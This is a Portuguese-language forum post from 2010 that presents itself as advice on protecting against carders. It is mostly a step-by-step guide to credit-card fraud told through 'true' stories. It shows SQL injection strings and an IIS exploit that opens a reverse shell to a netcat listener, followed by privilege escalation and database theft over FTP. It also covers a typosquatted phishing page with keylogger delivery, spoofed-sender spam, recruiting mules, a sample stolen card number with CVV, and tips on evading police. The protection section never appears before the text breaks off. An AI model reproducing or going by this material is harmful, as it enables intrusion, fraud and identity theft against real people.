Como se proteger dos carders.

Ver o tópico anterior Ver o tópico seguinte Ir em baixo

Como se proteger dos carders.

Mensagem  veronmaiden em Seg Abr 05, 2010 2:01 pm

olá galera quem falar aqui e o carvalhe do sistem moderando do site insecuritynet bom galera tava vendo os conversa no irc sobre uma nova praga na net uma amigo meu feiz um tutorial muito bom sobre assusto vou posta aqui no forum para todos si ligar mais novas pragas na net blz
abraço fuiii

Matéria criada por K00D13 do clã Pirates Underworld Crew(irc.gigachat.net #pu).
Nós somos: Bluckbuobleo, K00D13, runVirus, uidZero, RayBlack.
Ex-membros: CH1C4UM, blackhawk, angra_rox.
Contato(K00D13): geek_crazy_boy@hotmail.com (msn).
veronmaiden@hotmail.com (msn).

Atenção:

O meu intuito com esta matéria não é incentivar você a praticar atos de carding/banking, e sim mostrar como eles agem, mostrar que sim, isso sim é considerado crime(você pode ser enquadrado no código penal por estelionato, lavagem de dinheiro, falsidade ideológica e outras acusações se usar de modo malicioso o que ver aqui, e isso da cadeia...), e principalmente aprender a se proteger de golpes de carders e armadilhas fraudulentas na internet.

Sumario:
( 1 ).................Quem são os carders e como agem(Modus Operanti).
( 2 )................Passos iniciais de um ataque de carding(laranjas, formação de grupo, planejamento, etc).
( 3 )................Métodos de ataque mais comuns e planejamento avançado(pishing, invasão de rede bancária, vulnerabilidades.)
( 4 )................Perigos do carding/banking(Tanto para o carder quanto para a vítima).
( 5 )................O principal: Como se proteger de ataques e golpes fraudulentos.
( 6 )................Citações e agradecimentos.

( 1 ) Quem são os carders e como eles agem.

Aqui vamos começar a entender e aos poucos nos aprofundar no estudo das técnicas de carding/banking. Mas antes de entendermos isso, precisamos entender como as pessoas praticantes dessas técnicas agem. Afinal de contas, quem são os carders?Em uma explicação simples, o carder é uma variante do cracker(o hacker maligno também chamado de Black Hat) que se especializa nos golpes que envolvem cartões de crédito e dinheiro, para tirar proveito próprio usando a conta(e o dinheiro) de terceiros na qual eles lesaram.

Um carder se aproveitará da maior fonte de vulnerabilidades que se possa existir. Essa vulnerabilidade não está em um kernel de linux, não está em uma versão velha do apache e tão pouco em um servidor de ssh. Essa vulnerabilidade está dentro das pessoas. Os carders também são ótimos engenheiros sociais e vão molestar o fator humano tirando proveito do mesmo até onde eles conseguirem. Desde que a engenharia social começou a se tornar um termo famoso com Kevin David Mitnick e outros como Frank Willian Abgnale, vimos que o maior rombo de segurança é a ingenuidade humana(e na qual não existe patch para correção).

O carder irá explorar a ingenuidade humana, usará alguma técnica virtual(ou labial, ou ambas) fraudulenta para obter dados importantes da vitima(Tais como Rg, cpf, nome, endereço, telefone, bairro, cidade, estado, país e principalmente senhas bancarias e números de cartão de crédito do indivíduo). Após ser bem-sucedido em seu ataque, o carder terá posse de todos os dados vitais da vítima e os usará sem escrúpulos ou remorso algum, efetuará varias compras com valores extremamente caros e tomando todo o cuidado possível para não ser preso. E caso ele consiga isso, terá tudo o que quiser e quem sofrerá com o prejuízo vai ser a vítima.

A seguir você verá como vários ataques carders são feitos, cada detalhe. Os passos 2,3 e 4 podem te transformar em um carder habilidoso,mas vale lembrar que esse não é o objetivo dessa matéria e não me responsabilizo por nada que você venha a fazer. Nem eu e nem ninguém desse fórum.

( 2 ) Passos iniciais de um ataque de carding.

Quando o carder vai botar seus planos maliciosos em prática, a primeira coisa que ele se preocupa em conseguir são laranjas confiáveis.Laranjas são pessoas que normalmente conhecem o carder e são amigas dele, ou as vezes até mesmo parentes deles. Essas pessoas são as pessoas que vão ajudar o carder recebendo a encomenda (a mercadoria comprada ilegalmente pelo carder) por ele, mas sempre pedem algo em troca, seja algum presente como um celular, ou parte da quantia em dinheiro que o carder vai obter.

Tendo obtido pessoas confiáveis que agem como laranjas no plano, a próxima etapa é formar um grupo carder para executar o plano em si. Há vantagens e desvantagens em se formar uma "crew" dessas. Um fato é que é extremamente difícil e trabalho (e também muito arriscado) para um carder só fazer todo o plano. Porém caso ele seja bem-sucedido em um ataque solo,ele terá apenas que pagar o(s) laranja(s) e todo o resto ficará para ele acumulando bens ilícitos em grande quantidade.

Porém um carder prefere formar um grupo para executar o ataque, conseguir bastante dinheiro e assim distribuir entre eles em uma quantidade que agrade a todos, além de poder pagar os laranjas.

Formado o grupo e conseguido laranjas confiáveis, o próximo passo é definir o método de ataque e assim desenvolver o planejamento. Existem vários métodos de ataques de carders, apesar de eles serem vistos detalhadamente no próximo passo, ai vai alguns:

[A] Ataque Labial indireto ou direto: Ataque em que o carder consegue obter as informações vitais usando puramente engenharia social. Seja via email, telefone ou até mesmo pessoalmente se passando por uma pessoa na qual não é (falsidade ideológica, portanto crime!).

Invasão de rede bancaria: Obviamente o método mais trabalhoso, porém [b]não impossível(nada é impossível). Neste tipo de ataque, o carder estuda os diversos tipos de softwares usados pelo banco para controlar cadastros, informações e transações bancárias. Esse ataque ocorre quando o carder consegue invadir a rede interna de um banco, e tendo conhecimentos dos softwares, os usa para manipular o dinheiro de terceiros escolhidos aleatoriamente ou a dedo, e assim transferindo o dinheiro para uma conta pirata que o carder mandou um de seus laranjas abrirem. Esse método é bem trabalhoso, pois exige tempo para contornar as defesas do banco como o sistema IDS/Honeypot, o firewall que costumam ser muito bem configurados, além do sistema de criptografia do banco ser algo realmente duro de crackear (mas lembre-se, difícil não quer dizer impossível).

[C] Exploração de vulnerabilidades em sites comercias: Um método muito utilizado. Trata-se de simplesmente verificar se sites de comércio estão com alguma vulnerabilidade que permite a visualização de dados vitais de clientes, mesmo que criptografados. Um exemplo perfeito disso é um site de comércio online que esteja vulnerável a sql injection em algum campo. O carder pode ir explorando, por exemplo, os erros do banco de dados para descobrir nomes de suas tabelas. E depois disso, se o site permitir comandos avançados de sql, uma coisa muito perigosa poderia ser o comando sql abaixo(apenas um exemplo):

Select * From 'clientes_nome' Where 'nome_completo' = '' 'or '1 = '1

Com isso o carder começa listando o nome de todos os clientes do site e em seguida...

Select * From 'dados_bancírios' Where 'cartao_numero = '' 'or '1 = '1 and 'senha_bancaria' = '' 'or '1 = '1
Nem preciso explicar não é? O carder acaba de listar o número dos cartões de crédito e a senha bancária dos clientes. Modificando um pouco os comandos acima, o carder pode ir acumulando as informações dos clientes como rg, cpf, telefone, endereço, etc, até que ele tenha todos os dados e se faltar algum, ele pode usar os dados jí obtidos para pegar os que falta fazendo um ataque de seing(engenharia social) na própria vítima que ele está acumulando as informações.

[D] Pishing e malwares: Esse é um método utilizado muito em engenharia social. Cria-se uma página perfeita e falsa de um banco (o pishing em si), mas que o cliente não desconfie. Tão perfeita que tenha os links que mande mesmo para os outros locais do site verdadeiro, tendo a malàcia apenas em um dos campos (normalmente de login). Quando um usuário clica, ele irá receber uma caixa de mensagem indicando um erro, ou simplesmente ser redirecionado para uma página simples como "Limite de banda excedido, por favor, tente novamente mais tarde". A pessoa não desconfia de nada e tenta novamente mais tarde. Mas assim que esse falso erro foi gerado na página falsa, um malware espião(como um keylogger ou trojan) acabou de ser instalado no computador da vítima e irí capturar tudo o que ela digitar mandando tudo via email ou ftp para o carder sem que a vítima perceba algo.

Tendo escolhido o método de ataque, falta agora fazer o planejamento. E é nessa hora que um grupo ajuda, pois cada um executa uma função. Por exemplo, um programa o keylogger, enquanto o outro fica responsável pelo spam, o outro pela engenharia social, o outro pelo pishing, o outro manda um laranja abrir uma conta pirata, e assim por diante.


Nó próximo passo você terá explicações mais avançadas, além de você vários casos de ataques carders envolvendo pequenos contos. Esses contos sim são verdadeiros, porém o nome dos atacantes e das vítimas foram trocados para evitar frustrações. Fique atento, pois será no passo seguinte que você vira detalhadamente cada ataque carder em andamento.

( 3 ) Métodos de ataque mais comuns e planejamento avançado:
Aqui você vira contos (verdadeiros apesar dos nomes fictícios dos personagens) que mostrarão com detalhes cada ataque de forma separada. Nesse passo que você vira realmente como os carders agem.
Caso 1: Vulnerabilidades em sites comerciais
Um carder, vou chamar ele de Rafael aqui, está louco para comprar aquele lindo Notebook com tecnologia dual core, rede wireless, placa de vídeo de 512MB e 4GB de ram que vem com a distro linux Debian embutida, mas essa belezinha custa exatamente R$8.000,00. Rafael não está no momento com seus amigos por perto, todos estão no interior do Estado viajando (tudo está se passando em São Paulo - SP).

Como não há como fazer um ataque li muito sofisticado, Rafael decide procurar por brechas de segurança em sites comerciais espalhados pela internet. Um meio mais fácil e rápido para conseguir uma graninha, que no caso, Rafael está precisando muito. Ele liga seu computador localizado no canto de seu quarto, se trata de uma máquina com uma banda larga realmente boa(8mb de velocidade) e rodando um linux Fedora 4. Ele abre seu navegador konqueror e acessa a página no google. Rafael estí pensando em uma string bem inteligente para mandar o google pesquisar sobre sites comerciais. Mercado livre não seria uma boa opção nesse momento, então ele pensou: "Hmm... sites de pet shops online costumam vender coisas por cartão, e sua segurança não é lí muito boa..."

Ótima idéia, Rafael envia a seguinte string no formulário do google:

allinurl: "pet shop nacional"

Com isso, vários sites de pet shops brasileiros são "cuspidos" na tela assim que Rafael clica no botão "pesquisar".

Rafael faz uma lista razoável dos principais sites retomados em um editor de texto simples do linux(no caso ele usou o vi direto do terminal). Então ele abriu seu scanner nessus. Como tanto o servidor e o cliente gráfico estão na mesma máquina(ou seja, operando puramente em localhost), Rafael conecta rapidamente no seu servidor. Ele manda o nessus scannear apenas as portas 80(http) e443(https). Com isso, os scans não serão tão demorados. Na parte de plugins, ele habilita os testes relacionados a servidores web(webservers) e banco de dados(database) apenas. Isso fará com que o nessus descubra furos em servidores web que permitam possivelmente uma invasão e também checarí falhas no ssl(secure socket layer) do site, a fim de testar a segurança da criptografia de dadose por último testar falhas de sql injection no site.

Nos três primeiros sites, Rafael não conseguiu nada. Mas no quarto o nessus acusou que uma falha potencialmente perigosa permitiria um invasor obter acesso não autorizado no servidor. Esse se tratava de uma máquina Windows 2000 SP 4, com IIS 5.0 e possivelmente vulnerável.

Rafael quis ter mais certeza, então usou o nmap com os seguintes argumentos em seu terminal (ele executou os comandos como root):

# nmap -sV -O -P0 -vv http://www.site-possivelmente-vulneravel.com.br

E analisando a saída ecoada em seu terminal, era exatamente isso que o nessus havia dito

TCP/80 OPEN - Microsoft IIS 5.0
TCP/443 OPEN - Microsoft IIS 5.0 (Secure_Socket_Layer)

Device type: General purpose.
Running: Windows NT/2K/XP
OS Detaisl: Windows 2000 SP4

Ótimo, agora basta procurar o exploit certo e Rafael poderá ter grandes chances de invadir o servidor web.

O nessus também acusou que a criptografia do ssl era possivelmente falha, o que não dará muitos problemas para Rafael se ele tiver que na hora crackear alguma coisa. Ele começa acessando o security focus(http://www.securityfocus.com) e procura por IIS 5.0 na barra de search(pesquisar). Logo ele encontra um bid(Bugtrack ID) que fala a respeito de um estouro de buffer na qual se obtem uma shell remotamente por connect back. Ele clicou na aba exploit e havia o exploit disponàvel em C, e o melhor que era um exploit que se compila no linux, ele baixou o exploit e executou o seguinte comando no terminal:

# gcc -o hell iishack2000.c

Isso gerou um arquivo binário chamado hell.

Rafael executou simplesmente: ./hell e as seguintes instruções ecoaram no seu terminal:

[banker-sys01@root]# ./hell

usage: ./hell <hostname/ip> <port> <your_ip> <shell_port>

Shell_Port significa que Rafael terí que deixar uma porta escutando em seu computador para receber uma shell, e your_ip rafael terí que inserir seu ip real que é 201.142.23.88. Ele abre outro terminal(agora como usuário normal) e digita:

$nc -l -vv -p 1500

Ele deixa a porta tcp 1500 escutando com o netcat(nc). Agora no terminal que esta como root, ele volta a executar o exploit:

./hell http://www.site-possivelmente-vulneravel.com.br 80 201.142.23.88 1500

O exploit manda Rafael aguardar e enquanto isso ele reza para que o servidor não esteja patcheado. Ele recebe a última mensagem do exploit na tela:

[+] Sucefull! Check the specified tcp port

Ele abre o outro terminal e vê o seguinte:
$nc -l -vv -p 1500
connected from site.....bla bla bla

[root1@root]#

Yeah! Não estava patcheado e agora Rafael tem acesso root(super usuírio, raiz) no sistema. Ele nao tem objetivo de fazer deface, e sim localizar aquele banco de dados que o nessus achou no site, mas que não estava vulnerável a sql. Ele localizou um backup dele em C:\WINDOWS\Temp, com o nome de users_db.mdb. Só que há dois problemas:

(1-) Rafael não está no Windows para abrir arquivos do acess(.mdb).
(2-)Não há um meio simples de se transferir o arquivo para sua máquina

Rafael faz um teste com o nmap para saber se o servidor de ftp estí rodando no servidor, e por sorte, anonymous pode ser acessado usando login anonymous e um email qualquer como senha, mas é em vão, pois anonymous não pode baixar arquivos de nenhum diretório importante do sistema. A saída então é tentar obter um usuário com mais privilégios no ftp ou achar outro meio de obter o backup do banco de dados. Mas como ele fará isso? Simples, ele ja estí com acesso administrativo em uma shell graças ao exploit, então ele simplesmente adiciona o usuário anonymous ao grupo administrativo do servidor para que ele tenha acesso a todos os diretórios do sistema. Ele usa o seguinte comando na shell remota:

C:\> net localgroup /add anonymous

Uma mensagem mostra que ele foi adiciona com sucesso ao grupo administrativo. Rafael volta a se conectar no ftp como anonymous(só que agora com privilégios de admin) e dois comandos são o suficiente para a sua alegria:

cd %SystemRoot%\Temp
get users_db.mdb

Ótimo! Está feito! Rafael disconecta do ftp e agora ele tem o backup de todo o banco de dados do site comercial, cheio de informações valiosas. Mas ainda um problema persiste, ele não estí em um Windows para abrir arquivos do acess.
Ele então liga para um de seus amigos torcendo para que ele esteja em casa, seu amigo é Marcos, ele também é um carder. Acompanhe o diálogo pelo telefone:

R: "Ei Marcos, preciso de sua ajuda cara."
M: "Hmmm....o que seria Rafael?"
R: "Peguei um arquivo interessante do acess, mas estou no linux e não posso abrir ele. Você está com windows ai?"
M: "Sim, o XP."
R: "Estí com o office nele?"
M: "Com o 2003."
R: "Ótimo, se não estiver ocupado, entre agora em irc.fullnetwork.org canal #full, vou te passar o arquivo em pvt."
M: "Ok, estou conectando já."

Eles desligam em um canal de irc, Rafael passa o arquivo para ele. Agora acompanhe o dialogo pelo irc. Rafael está usando o apelido D4RK_D3V1L e Marcos simplesmente D4D3.

<D4D3> Ha um problema.
<D4RK_D3V1L> O que houve?
<D4D3> O arquivo está com senha. Vou ter que fazer brute force nele.
<D4RK_D3V1L> Ok, faça assim então. Quebre a senha dele e me mande uma copia sem senha para o meu email assim que conseguir amanhã.
<D4D3> Ok, vou fazer isso cara.
<D4RK_D3V1L> Cara...Valeu mesmo, se esse lance der certo eu reparto o lucro com vc Wink Vou dormir um pouco agora, estou morto.
<D4D3> Beleza cara valeu. Vou deixar o brute rodando aqui e vou descansar um pouco também.

No dia seguinte, Rafael pediu para usar a maquina windows do seu vizinho e levando um cd virgem, checa o email e havia uma nova mensagem de Marcos. Estava anexado o arquivo do banco de dados e havia a seguinte mensagem:

"Consegui cara, a senha para acessar o banco de dados é: $#!@hp40gksm046$#@!
Pelo o que deu pra ver você se deu bem, tem card pra caramba ai, além de outras infos hehe
Não se esqueça minha parte, afinal eu ajudei hehe.
Abraços, Marcos."

Rafael ficou tenso, a adrenalina subiu e ele acessou o banco de dados finalmente. Ele viu dezenas de clientes com informações bancárias completas. ele grava em cd, apaga o que ele tinha baixado no hd do vizinho, sai do seu email, agradece e volta para casa.
Ele está com a adrenalina disparada, ele volta para a casa e a primeira coisa que ele faz é ligar para Aline.
Aline é uma antiga amiga dele que se oferecia como laranja em seus planos carders em troca de um presentinho ou uma quantidade boa de grana. Acompanhe o segundo dialogo no telefone:

A: "Alô?"
R: "Oi Li..."
A: "Rafa! Beleza querido?"
R: "Beleza pura hehe. Consegui uns cards quentes para nós. E ai? Topa se arriscar mais uma vez?"
A: "Hmm...se você não esquecer da minha parte eu topo sim rs rs."
R: "Tudo o que quiser meu anjo. Apenas me diga o que quer."
A: "Hmm...Estou a fim daquele ipod que a gente viu no shopping naquela tarde lembra?"
R: "Lembro sim. Fechado. Vou testar os cartões em local seguro. Se ocorrer tudo bem, posso mandar entregar ai?"
A: "Sim, só que antes tenha certeza que não vão pegar a gente."
R: "Claro, até mais tarde então Li."

Rafael vai a um cyber café em outro bairro(tomando ônibus para isso), pois nisso já dificulta o rastreamento. Não é sábio usar um cyber café ou lan house muito perto de sua casa, principalmente se o cadastro for obrigatório.
Ele põe uma hora em uma máquina mais escondida ao fundo da sala, acessa o cd e assim o banco de dados. Agora ele precisa testar logo pelo menos um cartão para ver se está tudo bem e assim poder efetuar compras melhores. Ele escolhe a dedo uma vítima do banco de dados, com as seguintes informações:

Nome: Maria Fernanda Galante
Nome impresso no cartão: M FERNANDA GALANTE
Número do cartão: 4532117021980223
Validade do Cartão mês: 12 / ano: 7
Código de Segurança do Cartão 023
BANCO BRADESCO S.A.

Ele entra em um site pornográfico e faz a compra de um vidro de viagra e manda entregar na casa de um velho chato que mora em sua rua para sacanear ele, ao ver que o cartão está funcionando. Ao ver que sim, ele testa pelo menos mais uma dúzia de cartões do banco de dados e ao ver boas respostas de todos, ele começa a fazer montes e montes de comprar como seu notebook, o ipod de aline, um mp4 para Marcos que ajudou, entre outras coisas. Ele sai de sua maquina, pega seu cd e sai como se não tivesse feito nada demais, ninguém desconfiou ou ficou prestando atenção no que ele estava fazendo. Ele pagou sedex para que tudo chegue bem logo.

No dia seguinte, ele liga novamente para Aline e ela confirmou que as entregas já vinham chegado e que vinham de varias lojas diferentes. Ele pega seu carro e foi para a casa de Aline que é razoavelmente longe. Ele pega tudo e Aline diz que para ele ficar com o ipod até passar umas semanas, pois a policia federal vai investigar com certeza, então quando tudo passar, ele da a ela o ipod. Ele concorda, checa se nenhum pacote está grampeado, e volta para casa.

Algum dia depois a policia bate na casa de Aline, interroga, investiga e não acha nada. Uma semana depois disso Rafael entrega o ipod a ela e novamente agradece a ajuda. Como não havia provas contra Aline e Rafael fez tudo corretamente para que não fosse rastreado, nem sequer enquadrado como suspeito, dessa vez o carding foi bem sucedido.

O que o leitor deve captar é as "manhas", nunca fazer de casa, usar uma lan bem longe de onde você mora, assim como os laranjas que você confia. O básico do anonimato(proxy + apagamento de logs) e ainda testar o cartão em coisas bestas antes de fazer uma compra importante para não perder tempo. Caso seja necessário cadastro, fazer um falso nem que tenha que forjar um rg todo para isso em uma lan house ou cyber café.
Esse foi um dos contos, foi um até que simples, mas há mais manhas a serem aprendidas e os próximos contos se encarregarão de mostrá-las.
Caso 2: Atacando em grupo.
Aqui é um caso totalmente diferente com personagens diferentes. Um carder adolescente chamado Erick recebeu uma ligação de Eduardo, um conhecido de seu primo. Acompanhe o dialogo:

Er "Alô, aqui é o Erick. Quem fala?"
Ed "Oi Erick. Aqui é o Eduardo amigo do seu primo que trabalha com ele na firma. Lembra de mim?"
Er "Claro que sim Eduardo. Aconteceu alguma coisa?"
Ed "Gostaria de fazer um acordo com você. O patrão negou aumento para o seu primo e para mim. Tem que como você dar uma lição nele?"
Er "Não de graça..."
Ed "Certo. Diga o seu preço. Mas quero que de algum prejuízo a ele. Algo financeiro."
Er "Estou com muita vontade de pegar um playstation 3. De resto, ele estará em minhas mãos."
Ed "Fechado."
Er "Ok, vou começar a esquematizar o plano para ferrar esse imbecil. Te ligo assim que conseguir algo."
Ed "Feito. Ate mais tarde então."
Er "Até Ed."

Agora Erick tem motivos para executar um ataque não-ético. Ele não faz isso apenas para ter o seu playstation 3, mas sim também para vingar seu primo que trabalha muito naquela firma e com certeza merecia um aumento. Erick começa ligando para o seu primo, explica o que Eduardo lhe disse, explica que planeja vingança contra o patrão, só que ele precisava de informações, então fez algumas perguntas bem elaboradas para o seu primo, e o mesmo respondeu facilmente todas elas. Erick consegue as seguintes informações:

Nome do patrão: Marcelo Wander Vendelli.
Idade: 46 anos.
Descrição física: Olhos castanhos, calvo, cabelos negros, 1,83cm de altura, 76 kg, etnia caucasiana.
Hobies: Orkut, Futebol, Carros, Sinuca, Jogos de cartas, festas.
Conhecimento sobre segurança de computadores: Muito baixa. (...)
Email: Marcelo@vitima.com.br

Essas informações já ajudaram bastante, Erick avisa o seu primo que se obter sucesso voltaria a ligar. Erick já pensou em um plano bem interessante para executar contra o que ele julga ser "o filho da p%$@ mais mão-de-vaca do mundo", mas ele não pode executar esse plano tão engenhoso sozinho. Então ele precisa arrumar uma crew logo, e ele já sabe quem chamar: Dennis, Rodrigo e Walter. Esses jí são seus amigos e parceiros de hacking/carding de Erick a alguns anos e são pessoas que ele pode confiar. O melhor de tudo é que eles moram a poucos quarteirões da casa de Erick. Mas é óbvio que é muito mais sábio verificar se eles estão disponíveis no irc para marcar um local na qual possam planejar o ataque de modo tranqüilo antes do que ir na casa de cada um sem saber se estão fazendo outra coisa.

Erickl iga seu computador, está rodando Windows XP nada demais, mas Erick arruma um jeito caso precise operar algum Unix ou Linux para executar alguma tarefa. Ele conecta no seguinte servidor e no seguinte canal:

Servidor:irc.fullnetwork.org
Canal:#full

Essa rede é um dos pontos de encontros principais de carders/bankers de todo o país. Ao se conectar, Erick fica feliz em ver os três onlines e aparentemente "sem porcaria nenhuma para fazer". Erick em pvt(abreviação de private, que seria uma janela de conversa entra apenas duas pessoas no irc) passa aos três o seguinte endereço:
Conectem nesse canal agora, tenho algo importante para lhes contar: #Erick_Carder_Crew
Ótimo, todos se encontram em outro canal do servidor agora, apenas os quatro. Assim, eles podem ficar mais a vontade enquanto discutem como vai ser o plano. Erick conta a eles o que aconteceu, como pretende se vingar e pergunta se poderia ser na casa de um deles para que eles discutissem como seria o plano, o armassem e por fim, o colocariam em prática, claro que todos serão recompensados (o leitor já sabe como...). Walter sugere a casa dele, já que seus país estão trabalhando e eles terão paz para fazerem o que der na telha La dentro. Então combinaram todos de se encontrar na casa de Walter as duas da tarde. Enquanto isso, Erick disconecta, pega um caderno e vai fazendo pequenos diagramas e rascunhos de como será o plano(que desculpas usar, que ferramentas usar, como convencer a vítima, etc).

Chegando a hora, todos se encontram na casa de Walter, estão com máquinas, cadernos e o que mais eles queriam, uma sala calma só com eles quatro para discutirem da melhor forma o seu plano. Erick começa passando as informações que ele obteve do patrão para todos os outros. Eles decidem que vai ser uma combinação de pishing + um keylogger, seguido de spam e engenharia social. Dennis ficará a cargo de criar a engenharia social, Rodrigo como é um programador avançado, ficarí a cargo de criar o programa keylogger espião, Walter é um webmaster, então irá se encarregar de criar o pishing(a página falsa em si), e por fim, Erick vai coletar mais informações úteis, contatar laranjas, criar uma conta em um banco falsa e por fim enviar o spam. Caso sejam bem sucedidos, executarão as compras.
Erick liga para o patrão de seu primo a fim de fazer uma engenharia social para descobrir o sistema operacional da vítima. Acompanhe o diálogo:

E: "Boa tarde. Sou Vinicius da Rocha Oliveira do suporte técnico da microsoft brasileira. Com quem eu falo por favor?"
M: "Marcelo..."
E: "Senhor Marcelo, desculpe incomodá-lo, mas é que gostaríamos de avisar o senhor que não deverá atualizar seu sistema Windows no momento. Uma atualização do Internet Explorer no Windows XP está danificando o kernel do sistema. Se o senhor usa Windows XP Profissional SP 2, aguardo que espere a atualização do mês seguinte. O senhor usa Windows XP?"
M: "Não. Não uso nenhum Windows. O sistema do meu computador de casa é um Linux."
E: "Linux? Espere ai isso está errado. O senhor não é Marcelo Alvaro Melo?"
M: "Não, me chamo Marcelo Wander Vendelli."
E: "Ahn Deus, isso foi um terrível engano. Estamos tentando contatar outro Marcelo. Perdoe-nos pelo incômodo. Tenha uma boa tarde senhor."
M: "Tudo bem, acontece. Tchau, boa tarde para você também."
Erick descobre algo inesperado e conta para os outros. O sistema desse cara é linux e não windows, então eles vão ter que criar o keylogger em Kylix* ao invés de usar Delphi.

*: Linguagem de programação idêntica ao delphi para linux.

Agora Erick tem mais uma coisa a fazer, contatar um laranja que receba as mercadorias que vai ser o prêmio do pessoal por ter ajudado. Ele fará agora sua segunda ligação para contatar um velho amigo chamado Luis que já atuou de laranja em outros ataques de Erick. Veja como foi a conversa:

L: "Alo, aqui é o Luis. Quem fala?"
E: "Ei cara tudo bem? Aqui é o Erick. Conseguiu aquela tv de plasma que você estava querendo?"
L: "Opa! E ai meu brother beleza? Não cara, ainda não consegui."
E: "Bom eu e os caras estamos fazendo um plano ai e preciso de sua ajuda. Se for bem-sucedido, a gente vai conseguir muita coisa e eu te arranjo a tv. Mas a gente precisa de local para a entrega. Local que aqueles pfs filhos da p%¨$# não nos peguem."
L: "Bom cara, se vocês tiverem certeza que conseguiram, pode mandar vir aqui que eu recebo na boa."
E: "Beleza cara. Obrigado. Te ligo mais tarde então."
L: "Beleza, até."

Então foi decidido que a engenharia social ira se basear em um equipamento de carro tentador (já que os carros são uma das paixões da vítima). O keylogger e a página começam a ser montados, a página é um clone perfeito do mercado livre. Ao fim da tarde, o keylogger e a página estão hospedadas em um domànio falso(eles forma em uma lan e fizeram cadastro falso para hospedar o página e o keylogger) chamado de
http://www.mercodolivre.com.br/produto=id8995
Notaram a arte manha? Estíá escrito mercodo ao invés de mercado. Uma simples troca de letra deixa um domínio novo, porém é um detalhe que a vítima percebe a acaba caindo.
Agora Erick vai enviar o spam(ainda da lan) usando a engenharia social que Dennis armou. A engenharia ficou assim:

Prezado(a) Usuírio(a):
Confira a nossa super oferta para bancos de couro em automóveis!
Quatro acabamentos completos por apenas R$780,00!
E pagando a vista, você receberá até 30% de desconto! Uma oferta imperdível para os amantes de automóveis que queiram ter seu carro confortável e com boa aparência!
Mais detalhes: http://www.mercodolivre.com.br/produto=id8995
Grato!
-Equipe Mercado Livre.

Para mandar o spam, Erick se utilizará do aplicativo padrão dos sistemas Windows, o Outlook Express, e o servidor a ser usado é o servidor de email da yahoo. Ele abre o aplicativo e vai em Ferramentas > Contas > Adicionar > Email. Ele digita no nome Mercado Livre. No próximo campo ele insere noticias@mercadolivre.com.br. No próximo campo ele escolhe a forma POP3 de autenticação. Como servidor smtp ele coloca smtp.mail.yahoo.com.br e como servidor pop3 ele adiciona pop.mail.yahoo.com.br.

No próximo campo ele deve inserir uma conta verdadeira, seu email da yahoo é Erick_abcd@yahoo.com.br e sua senha é hy65j$%$23d356Gfh56¨%. Ele coloca login como
Erick_abcd e sua senha logo em seguida. Pronto! O email falso estia criado.

Agora ele volta em Ferramentas > Contas e define o email recem-criado como padrão. E depois clica na conta recem-criada e vai em propriedades > servidor. Marca a opção "Meu servidor requer autenticação" e da ok. Agora ele pode mandar emails falsos.

A página funciona assim: Assim que a pessoa clica, vai aparecer uma pagina idêntica ao do mercado livre, assim que ela clica em prosseguir aparece a mensagem:
"É necessário um plugin para visualizar a página corretamente. Deseja entalá-lo agora?"
Assim que ela clica em sim, o keylogger se aloja na computador da vitima e manda a pessoa tentar novamente, mas ai da um erro como "limite de banda excedido, tente novamente mais tarde."

Ele envia a mensagem para a vítima e voltam para casa.

Três dias depois eles vão em outra lan, fazem um cadastro falso e checam para ver se a vítima caiu no truque. Bingo! Todos os seus dados estão lí. Eles fazem dezenas de comprar e mandam entregar na casa do laranja contatado por Erick. São dezenas de notebooks, tvs, ipods, mp4, etc. Eles voltam para casa.

Na manhã seguinte, Erick pega as coisas em um carro, checa se nenhum pacote estí grampeado e fica com tudo em sua casa. Nisso, a policia investiga a casa do laranja e como não hí provas e não encontraram nada, eles são vitoriosos dessa vez. Luis ganha a sua tv de plasma, o grupo de Erick divide os "prêmios" entre eles.

Erick envia os dados bancários para o amigo do seu primo e fatura seu playstation 3 que era a única coisa que ele queria com tudo isso. Mais uma vez, isso foi um exemplo de um ataque carder bem-sucedido.

O que vale resaltar é que é importante que o leitor capite todas as "manhas" nos contos, para saber como não ser preso e ser bem sucedido em uma ação dessas.


Caso 3: Pura engenharia social

Essa não é uma história feita por mim, mas sim um historinha do famoso livro A arte de enganar de Kevin David Mitnick. Decidi assim porque essa história se encaixa perfeitamente no contexto de caso. Acompanhe.

"Certa vez eu estava em um restaurante com Henry e seu pai. Durante a conversa, Henry repreendeu
o pai por dar o número do seu cartão de crédito como quem da o número do telefone. "É claro que
você tem de dar o número do seu cartão quando compra alguma coisa", ele dizia. "Mas da-lo em
uma loja que arquiva o seu número em seus registros ? isso é burrice."

"O único lugar em que faço isso é na Studio Vídeo", disse o Sr Conklin, referindo-se à mesma
cadeia de locadoras de vídeo. "Mas verifico a minha fatura todos os meses. Eu percebo se eles começarem
a aumentar a conta."

"É claro", salientou Henry, "mas depois que eles têm o seu número, qualquer pessoa pode
roubí-lo".

"Você se refere a um funcionário desonesto?"
"Não, qualquer pessoa e não apenas um funcionário."
"Você está dizendo bobagens", retrucou o Sr. Conklin.
"Posso ligar agora mesmo e fazer com que eles me dêem o número do seu cartão Visa", respondeu
Henry.
"Não, você não pode", afirmou o pai.
"Posso fazer isso em cinco minutos, bem na sua frente sem nem ter de sair da mesa."
O Sr. Conklin olhou firme, o olhar de alguém que se sentia seguro, mas que não queria mostrar
isso. "Digo que você não sabe do que está falando", desafiou, tirando do bolso a carteira e jogando
uma nota de 50 dólares na mesa. "Se fizer o que está dizendo, o dinheiro é seu."
"Não quero o seu dinheiro pai", disse Henry.

Ele pegou o telefone celular, perguntou ao pai qual era a loja e ligou para o Auxílio à Lista pedindo
o número do telefone e também o número da loja na região de Sherman Oaks.
Em seguida, ligou para a loja de Sherman Oaks. Usando mais ou menos a mesma abordagem
descrita na história anterior, ele rapidamente conseguiu o nome do gerente e o número da loja.
Ligou para a loja na qual o seu pai tinha a conta. Ele usou o velho truque de se fazer passar pelo
gerente, deu o nome do gerente como o seu próprio e o número da loja que havia obtido. Tomou a
usar o mesmo truque: "Os seus computadores estão funcionando hoje? Os nossos às vezes funcionam,
às vezes não." Ouviu a resposta e continuou: "Bem, tenho um dos seus clientes aqui comigo e
ele quer alugar um vàdeo, mas os nossos computadores estão fora do ar agora. Preciso ver a conta do
cliente e ter certeza de que ele é um cliente da sua loja."

Henry deu o nome do seu pai. Em seguida, usando apenas uma pequena variação da técnica,
pediu para ela ler as informações da conta: endereço, número de telefone e a data em que a conta foi
aberta. Depois disse: "Ouça, estou com uma fila enorme de clientes aqui. Qual é o número do cartão
de crédito e a data de vencimento?"

Henry segurou o celular no ouvido com uma mão e com a outra escreveu em um guardanapo de
